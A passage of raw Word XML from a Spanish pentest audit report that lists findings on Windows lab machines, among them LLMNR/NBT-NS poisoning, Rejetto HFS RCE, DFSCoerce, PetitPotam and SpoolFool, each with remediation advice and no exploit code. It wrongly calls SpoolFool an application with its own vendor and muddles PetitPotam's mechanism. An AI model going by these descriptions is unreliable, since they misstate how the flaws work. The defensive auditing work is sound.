    <w:p w14:paraId="2E208629" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74AB1774" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08030D1F" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400BC246" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4D119A" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E0406F" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610C12E6" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="005F6B70" w14:textId="77777777" w:rsidR="00C25D27" w:rsidRDefault="00C25D27" w:rsidP="005B6B2A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269B396F" w14:textId="6E9F7585" w:rsidR="00C25D27" w:rsidRDefault="00B10908" w:rsidP="00BB02CD">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc135576002"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidR="00BB02CD">
        <w:t>Informe de auditoria</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="58AFC9BB" w14:textId="77777777" w:rsidR="00BB02CD" w:rsidRDefault="00BB02CD" w:rsidP="00BB02CD"/>
    <w:p w14:paraId="6F1C1CD6" w14:textId="0F487329" w:rsidR="00BB02CD" w:rsidRDefault="00BB02CD" w:rsidP="00BB02CD">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc135576003"/>
      <w:r>
        <w:t>Informe ejecutivo:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="73F8EAA5" w14:textId="77777777" w:rsidR="00BB02CD" w:rsidRDefault="00BB02CD" w:rsidP="00BB02CD"/>
    <w:p w14:paraId="312E23FE" w14:textId="005E0ED9" w:rsidR="00BB02CD" w:rsidRPr="000F6426" w:rsidRDefault="00BB02CD" w:rsidP="00BB02CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ahora procederé a explicar las vulnerabilidades encontradas en los análisis y en la prueba de pentesting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408CD5C7" w14:textId="371138CD" w:rsidR="00BB02CD" w:rsidRPr="000926EC" w:rsidRDefault="00194707" w:rsidP="00BB02CD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Maquinas </w:t>
      </w:r>
      <w:r w:rsidR="000F6426" w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFFEA9F" w14:textId="7DC42D9D" w:rsidR="00194707" w:rsidRPr="000F6426" w:rsidRDefault="00194707" w:rsidP="00BB02CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>En estas máquinas se encontraron muchas vulnerabilidades, gran mayoría son vulnerabilidades ya parcheadas de Windows, de echo también se cuanta como vulnerabilidad los parches no aplicados de Windows, como se puede ver en esta captura de Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8E56F2" w14:textId="11AA3684" w:rsidR="00194707" w:rsidRDefault="00194707" w:rsidP="00BB02CD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49FA2D0F" wp14:editId="53256CCD">
            <wp:extent cx="6645910" cy="3347085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="340327239" name="Imagen 34032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6658" name=""/>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5F22E339" w14:textId="1DABF35C" w:rsidR="00BB02CD" w:rsidRDefault="00194707" w:rsidP="00BB02CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Donde estas vulnerabilidades son parches que faltan de Microsoft, esto se solucionaría aplicado los parches y actualizando los equipos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3024D799" w14:textId="716D8404" w:rsidR="000926EC" w:rsidRPr="000926EC" w:rsidRDefault="000926EC" w:rsidP="00BB02CD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Máquina Windows 10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511DFC6" w14:textId="519F52DF" w:rsidR="00194707" w:rsidRPr="000F6426" w:rsidRDefault="000926EC" w:rsidP="00BB02CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00194707" w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>e encuentra la vulnerabilidad del servidor http, además de las vulnerabilidades por no tener actualizado el sistema</w:t>
      </w:r>
      <w:r w:rsidR="00BE7CDF" w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, que aunque solo salgan como informativas son importantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B6067" w14:textId="77777777" w:rsidR="000F6426" w:rsidRDefault="00BE7CDF" w:rsidP="00BB02CD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="607D995B" wp14:editId="4CFE8AAF">
            <wp:extent cx="6652009" cy="2345690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1194972385" name="Imagen 119497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5110" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId351" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6660302" cy="2348615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C353643" w14:textId="7D312EF5" w:rsidR="00194707" w:rsidRPr="000F6426" w:rsidRDefault="00194707" w:rsidP="00BB02CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Para el caso del servidor</w:t>
      </w:r>
      <w:r w:rsidR="00BE7CDF" w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> de  archivos http, la solución es actualizarlo, pues si se quiere seguir usando ese programa no hay otra solución pues esa versión es vulnerable, si no se quisiera hacer eso se tendría que buscar otro programa que haga esa función.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A5B57A" w14:textId="1FA7C60B" w:rsidR="00BE7CDF" w:rsidRPr="000F6426" w:rsidRDefault="000F6426" w:rsidP="00BB02CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ahora pasaremos a analizar las vulnerabilidades descubiertas en el pentesting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE2896A" w14:textId="342DAACF" w:rsidR="000F6426" w:rsidRPr="008F170F" w:rsidRDefault="000F6426" w:rsidP="000F6426">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F170F">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidad: Robo de credenciales de red mediante envenenamiento LLMNR-NBT-NS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A9246" w14:textId="319EB14C" w:rsidR="000F6426" w:rsidRDefault="000F6426" w:rsidP="000F6426">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Descripción: El envenenamiento de LLMNR-NBT-NS es una técnica utilizada por los atacantes para robar credenciales de red en entornos locales. LLMNR (Link-Local Multicast Name Resolution) y NBT-NS (NetBIOS Name Service) son protocolos utilizados por los sistemas operativos de Windows para resolver nombres de dominio en redes locales cuando no se puede acceder a un servidor DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B399B4" w14:textId="3554FC96" w:rsidR="000F6426" w:rsidRDefault="000F6426" w:rsidP="000F6426">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deshabilitar LLMNR y NBT-NS: La forma más efectiva de mitigar esta vulnerabilidad es desactivar estos protocolos en todos los dispositivos de la red. Esto se puede hacer mediante la configuración de directivas de grupo o la modificación manual de la configuración en cada dispositivo. Al deshabilitar estos protocolos, se eliminará la posibilidad de envenenamiento y robo de credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E990F4F" w14:textId="77777777" w:rsidR="0062080A" w:rsidRPr="000F6426" w:rsidRDefault="0062080A" w:rsidP="000F6426">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B8CA993" w14:textId="6CCEEB74" w:rsidR="0062080A" w:rsidRPr="0062080A" w:rsidRDefault="00C47ADA" w:rsidP="0062080A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F170F">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidad: Vulnerabilidad en el Servidor de archivos HTTP Rejetto (HFS) 2.3 (CVE-2014-6287)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19827180" w14:textId="77777777" w:rsidR="00C47ADA" w:rsidRDefault="00C47ADA" w:rsidP="00C47ADA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A22957" w14:textId="5E68E7A6" w:rsidR="00C47ADA" w:rsidRPr="00C47ADA" w:rsidRDefault="00C47ADA" w:rsidP="00C47ADA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C47ADA">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Esta vulnerabilidad permite a un atacante remoto ejecutar código arbitrario en el servidor afectado, lo que podría comprometer la integridad y la confidencialidad de los datos alojados en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F39535C" w14:textId="77777777" w:rsidR="0062080A" w:rsidRDefault="00C47ADA" w:rsidP="0062080A">
      <w:pPr>
        <w:ind w:left="1410"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C47ADA">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solución: Ac</w:t>
      </w:r>
      <w:r w:rsidR="0062080A">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tualizar</w:t>
      </w:r>
      <w:r w:rsidRPr="00C47ADA">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> el Servidor de archivos HTTP Rejetto (HFS) a una versión posterior que incluya el parche de seguridad correspondiente a la vulnerabilidad CVE-2014-6287. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493CAD6" w14:textId="77777777" w:rsidR="0062080A" w:rsidRDefault="0062080A" w:rsidP="0062080A">
      <w:pPr>
        <w:ind w:left="1410"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587C6CFF" w14:textId="592BA6F8" w:rsidR="0062080A" w:rsidRPr="0062080A" w:rsidRDefault="000072C9" w:rsidP="0062080A">
      <w:pPr>
        <w:ind w:left="1410"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F170F">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilidad: </w:t>
      </w:r>
      <w:r w:rsidR="00760A0D" w:rsidRPr="008F170F">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Coerce o DFSCoerce</w:t>
      </w:r>
      <w:r w:rsidR="007F7CDA">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="007F7CDA" w:rsidRPr="007F7CDA">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(MS-DFSNM</w:t>
      </w:r>
      <w:r w:rsidR="007F7CDA">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B438E9C" w14:textId="66C7B89A" w:rsidR="00760A0D" w:rsidRPr="00760A0D" w:rsidRDefault="00345A80" w:rsidP="00345A80">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción: </w:t>
      </w:r>
      <w:r w:rsidR="00760A0D" w:rsidRPr="00760A0D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hace uso del protocolo MS-DFSNM para forzar que un controlador de dominio se autentique contra una máquina controlada por el atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C2C2F3" w14:textId="77777777" w:rsidR="00760A0D" w:rsidRDefault="00760A0D" w:rsidP="00345A80">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760A0D">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>En esta autenticación se lleva a cabo un ataque de NTLM relay que permitiría al atacante ganar acceso al dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E95BB8" w14:textId="6082EA56" w:rsidR="00345A80" w:rsidRPr="00345A80" w:rsidRDefault="00345A80" w:rsidP="00345A80">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
      <w:r w:rsidR="00DF2F26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Se recomienda utilizar métodos de autenticación más seguros, como Kerberos o autenticación multifactor, en lugar de depender únicamente de NTLM. Estas soluciones ofrecen una mayor resistencia a los ataques de relé NTLM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58772F4F" w14:textId="3FAC1830" w:rsidR="00345A80" w:rsidRPr="0062080A" w:rsidRDefault="00345A80" w:rsidP="0062080A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F170F">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidad: PetitPotam</w:t>
      </w:r>
      <w:r w:rsidR="00A225A3">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00A225A3" w:rsidRPr="00A225A3">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MS-EFSRPC</w:t>
      </w:r>
      <w:r w:rsidR="00A225A3">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B97D33" w14:textId="50BF2926" w:rsidR="00345A80" w:rsidRDefault="00345A80" w:rsidP="00345A80">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Descripción: PetitPotam es un ataque sofisticado que se basa en una vulnerabilidad en el protocolo MS-EFSRPC de Windows. El atacante intercepta las solicitudes de autenticación NTLM y las retransmite al controlador de dominio, engañando al sistema para que envíe las credenciales NTLM al atacante. Una vez que se obtienen estas credenciales, el atacante puede utilizarlas para acceder a sistemas y recursos sensibles en la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF807F" w14:textId="61F1204C" w:rsidR="00EF2BEE" w:rsidRDefault="00EF2BEE" w:rsidP="00EF2BEE">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00345A80">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solución: Se recomienda utilizar métodos de autenticación más seguros, como Kerberos o autenticación multifactor, en lugar de depender únicamente de NTLM. Estas soluciones ofrecen una mayor resistencia a los ataques de relé NTLM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBC0E2" w14:textId="77777777" w:rsidR="000A625F" w:rsidRPr="000A625F" w:rsidRDefault="000A625F" w:rsidP="00EF2BEE">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531AE132" w14:textId="688905BF" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="000A625F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A625F">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidad de Escalada de Privilegios CVE-2022-21999 en SpoolFool</w:t>
      </w:r>
      <w:r w:rsidR="00CF358A">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19401D87" w14:textId="77777777" w:rsidR="0062080A" w:rsidRPr="000A625F" w:rsidRDefault="0062080A" w:rsidP="0062080A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E0952E7" w14:textId="6689A966" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="000A625F">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A625F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Descripción: La vulnerabilidad CVE-2022-21999 se encuentra en la aplicación SpoolFool y se clasifica como una vulnerabilidad de escalada de privilegios local. Este tipo de vulnerabilidad se produce cuando un atacante con acceso limitado al sistema aprovecha una debilidad en la configuración o implementación del software para obtener privilegios más altos en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08220BFC" w14:textId="0F26E378" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="000A625F">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A625F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solución: Se recomienda encarecidamente a los administradores del sistema que apliquen los parches y actualizaciones más recientes proporcionados por el proveedor de SpoolFool. Estos parches suelen incluir correcciones de seguridad para abordar las vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C59D62B" w14:textId="30ED3107" w:rsidR="000F6426" w:rsidRDefault="000A625F" w:rsidP="0062080A">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Y si no se usa el servicio de impresión desactivarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD20028" w14:textId="61E48C38" w:rsidR="00EF2BEE" w:rsidRDefault="00EF2BEE" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
